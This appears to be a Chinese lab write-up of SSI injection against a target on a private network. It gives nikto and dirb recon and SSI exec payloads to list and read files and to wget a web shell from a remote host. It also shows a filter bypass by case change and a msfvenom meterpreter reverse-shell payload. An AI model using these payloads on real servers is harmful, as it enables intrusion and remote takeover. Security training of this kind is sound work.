SSI注入

ssi是为了赋予html静态页面动态的效果,通过ssi执行系统命令,返回对应结果

若在网站目录中发现.stm,.shtm,.shtml,且网站对ssi的输入没有做到严格过滤,很可能收到ssi注入攻击

攻击机192.168.1.108

靶机192.168.1.109

nikto -host ip

+ Multiple index files found: /index.php, /index.shtml

dirb http://192.168.1.109

发现ssi可以注入

发现两个敏感文件

 

SSL注入漏洞

列举当前目录的文件和目录

<--#exec cmd="ls" --> 

切换到指定目录

<--#exec cmd="cat /root/dir" --> 

下载shell脚本,并重命名为shell.php

<--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" --> 

target注释掉了<

feedback 注释掉了exec,将其改为大写,大小写绕过

但没有给出反馈

SSI注入需要加一个感叹号

反弹shell

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw > /root/Desktop/shell.py

攻击机启动监听

将shell移到/var/www/html根目录下,并开启apache

返回shell

sysinfo 查看系统信息

shell进入系统shell

优化终端

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值